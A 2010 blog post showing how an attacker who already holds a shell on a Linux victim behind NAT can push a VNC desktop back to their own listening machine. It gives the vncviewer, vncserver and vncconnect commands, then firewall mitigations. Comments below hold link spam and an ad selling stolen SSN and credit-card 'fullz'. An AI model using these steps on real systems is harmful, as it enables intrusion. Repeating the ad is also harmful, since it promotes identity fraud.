Thursday, 16 December 2010

Setting up a reverse VNC connection (linux version)

If you are reading this, you have probably heard of a reverse shell, where an attacker uses a buffer overflow (or some other exploit) to connect from the victim back to an attacking system, who has a public IP address (perhaps bypassing a NAT or Firewall rule-set).

A lot of control is possible with a command line shell, but for some operations a graphical interface, such as VNC can be useful.

If a target system is behind a NAT, it is still possible to connect out with a VNC connection, giving graphical control of the target system to an external attacking system. This is possible, even without using SSH port tunnelling.

This article is only intended for educational purposes. Please do not use this to try to bypass security controls.


How to set this up

In this example I have two Linux systems, and the attacker system has used an exploit to gain an initial command line shell to the victim.

On the attacking system (which has a public IP address) start vncviewer as follows:

vncviewer -listen

You should get a response something like:

vncviewer -listen: Listening on port 5500


On the target system, you can start the VNC server and enter a password as follows:

vncserver :1

It is then possible to use vncconnect to connect the local vncserver on the target system, back to the attacker system:

vncconnect -display :1 :5500

This forwards the VNC connection from the target system back to the attacker, and a nice graphical interface of the target pops up on the attackers desktop.


Of course, these connections could be run on different ports (dependent on firewall rules) redirected with port-redirectors, or tunneled over other protocols, perhaps SSL using stunnel for example.

Similar solutions are just as easy with Windows systems, so definitely something to be aware of.


Mitigations
  • When definining Firewall rules, it is very important to focus on outbound rules (in addition to inbound rules)
  • Outbound connections should be logged and monitored to help identify hackers, virus infection, and technical employees trying to bypass security restrictions.

7 comments:

  1. Thank you for this!

    ReplyDelete
    Replies
    1. Insidetrust.Com: Setting Up A Reverse Vnc Connection (Linux Version) >>>>> Download Now

      >>>>> Download Full

      Insidetrust.Com: Setting Up A Reverse Vnc Connection (Linux Version) >>>>> Download LINK

      >>>>> Download Now

      Insidetrust.Com: Setting Up A Reverse Vnc Connection (Linux Version) >>>>> Download Full

      >>>>> Download LINK rI

      Delete
  2. Hey Guys !

    USA Fresh & Verified SSN Leads with DL Number AVAILABLE with 99.9% connectivity
    All Leads have genuine & valid information

    **HEADERS IN LEADS**
    First Name | Last Name | SSN | Dob | DL Number | Address | City | State | Zip | Phone Number | Account Number | Bank Name | Employee Details | IP Address

    *Price for SSN lead $2
    *You can ask for sample before any deal
    *If anyone buy in bulk, we can negotiate
    *Sampling is just for serious buyers

    ==>ACTIVE, FRESH CC & CVV FULLZ AVAILABLE<==
    ->$5 PER EACH

    ->Hope for the long term deal
    ->Interested buyers will be welcome

    **Contact 24/7**
    Whatsapp > +923172721122
    Email > leads.sellers1212@gmail.com
    Telegram > @leadsupplier
    ICQ > 752822040

    ReplyDelete
  3. Insidetrust.Com: Setting Up A Reverse Vnc Connection (Linux Version) >>>>> Download Now

    >>>>> Download Full

    Insidetrust.Com: Setting Up A Reverse Vnc Connection (Linux Version) >>>>> Download LINK

    >>>>> Download Now

    Insidetrust.Com: Setting Up A Reverse Vnc Connection (Linux Version) >>>>> Download Full

    >>>>> Download LINK ui

    ReplyDelete